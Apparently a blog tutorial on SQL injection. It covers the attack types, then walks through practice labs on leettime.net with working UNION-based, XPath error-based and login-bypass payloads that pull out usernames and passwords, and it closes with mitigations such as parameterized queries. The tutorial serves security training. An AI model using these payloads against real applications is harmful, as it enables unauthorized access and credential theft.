SQL INJECTION And its MITIGATION
Structured
Query Language (SQL) is used to order
data in database management system. SQL language is used for database creation,
fetching rows, deletion and rows modification etc.
The
commonly used SQL commands are:- SELECT,WHERE, FROM, INSERT, DELETE and UPDATE.
In web
application if the database is not properly configured, the glitches in it
leads to attack the database and
takeover it.
SQL injection is most prominent attack done on SQL
database to get database information and compromise it.
In SQL
injection we try to pass few SQL statements as input in our query. These
statements help us to control database. Using SQL injection an attacker can
bypass the authentication methods to retrieve the entire database contents.
Most Common types
of SQL injection
- Union-Based SQL Injection: In Union based we use union command in SQL statement to perform more queries.
- Error-Based SQL Injection: In this kind of injection attacker pass on SQL payload resulting into error I the result. This result provides us the required result response and helps in compromising database.
- Blind SQL Injection: Blind injection is one of the hardest one. In this kind of injection we are not getting any error. So for result we have to pass queries as question to get output. Bind injection are of two types- Boolean injection and Time based injection.
- Out-of-band SQL injection: In this we focus on using different channels for passing query and taking the result out.
To know more
about SQL injection go through Owasp 2017 Top 10 and can also follow given
link: https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
By using SQL
injection an invader can successfully:
- Compromise the database server and can ADD, DELETE, EDIT content of database.
- Bypass the security authentication and can impersonate as any user.
- Delete the whole data from the database for impacting the financial destruction of a corporate.
- Steal the data like credit card details, users credential, and personal information for personal benefit or to break the status of the company.
- Tamper the data in database like cost of a product or transaction details so as to affect data integrity and cause repudiation issues of corporate.
How to do SQL injection testing for vulnerability analysis:
Start with testing platforms like DVWA, webgoat or go to websites like http://leettime.net/ or http://testphp.vulnweb.com/ etc.
We will start with basic SQL injection. Choose the first challenge. The URL for testing is: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1.
Here “’” is used to get
the SQL error so as to understand the query. The URL is as follows: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' .
Now we try to gather information for columns for
this we use “order by statement”. Here order by 1 means sort by values of the
first column from the result set.
On increasing the number we are given the output as
Unknown column.
We
decrement -1 from the order by value providing us the value of existed column.
Using Union Select Statement we get the vulnerable
column number. The query passed is as: “http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1’
union select 1,2,3--+”.
Using
this SQL Statement we gather the information about the web app. Here we gather
information about database name, version etc.
 |
| DATABASE NAME |
 |
| Version |
Now we pass SQL statement to retrieve the
information about the tables that exist in the database. For that we pass the
query as: “http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1’ union
select 1,concat(table_name),3 from information_schema.tables where
table_schema=database()--+”.
From
the table “users” we now collect data for column
name for this particular table. The statement used for this is: “http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1’ union
select 1,concat(column_name),3 from information_schema.columns where
table_schema=database() and table_name=”users”--+”
And finally we collect the username and password
from the database using query: “http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1’ union
select 1,concat(username,0x3a,password,0x3a,sec_code),3 from users--+”
Now I will show you how to work on death row situation.
The link is as: “http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1”.
Now we pass
the quote “’” to get the error from this we get
how to handle this error.
Now on error handling we are given out the
result as below.
On using order by query we get to error of unknown column on “order by 6”.
So 5 is the number of columns.
Now on using union select we are not able to get the vulnerable column.
For death row condition we put “-” in id= parameter so as to get vulnerable
column information. The query is: “http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=-1’
union select 1,2,3,4,5--+”.
Now we follow same steps as the basic injection to get the table_name
and column_name. as following way by passing queries.
So now from table users we get the credential as follows.
Sometimes using above method doesn’t provide us the lucrative data so we
go for Xpath method to get result. The link for testing is: “http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1”. We pass error using quote in
statement.
We correct this error using “))” for error correction.
From the query we are able to find that only one column is there. So we are not able to retrieve any info. So
now we go for query of Xpath.
Now we pass SQL statement as: “http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1)) and extractvalue(null,concat(0x0a,database()))--+” and we get the database name as below.
The Statement used to get different table_name as subquery returns more
than one row we go for limit statement. The query is as: “http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1))
and extractvalue(null,concat(0x0a,select table_name from information
schema.tables where table_schema=database() limit 0,1))--+”. For
different tables change limit 0,1 to 1,1-2,1 and so on till the data exist.
In similar way we approach for column information to get column name.
the statement for getting column name is as: “http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1))
and extractvalue(null,concat(0x0a,select column_name from information
schema.columns where table_name=’users’ and table_schema=database() limit
0,1))--+”
At last we pass statement to get the username and password for the
users. The statement is: : “http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1))
and extractvalue(null,concat(0x0a,select concat(username,0x3a,password) from
users limit 0,1))--+”
Now we focus on some login panel where we pass some Boolean query as:
username= ‘or’=’ --+ and password any random
providing us the login access in web application.
Mitigation for SQL Injection
· The primary defence technique for SQL injection is
to use Parameterized Queries. This leads the developer to define the SQL codes
and then pass it in each parameter query. This allows the database to
distinguish between code and the data.
· White List the Input and Validation of input or
query redesign is the one of the dominant mitigation.
· Escape the user supplied input queries so that
statement does not execute. Use of encoders as a best practice.
· Personal data should be passed and stored in a hashed format.
· Use of WAF for better protection.
· Privileges assigned as per the rights of user to
minimise the SQL injection impact.
For
remedies recommend:
Very Nice, Keep it up!
ReplyDeletecybersecurity solution
cyber security solution
enterprise security solutions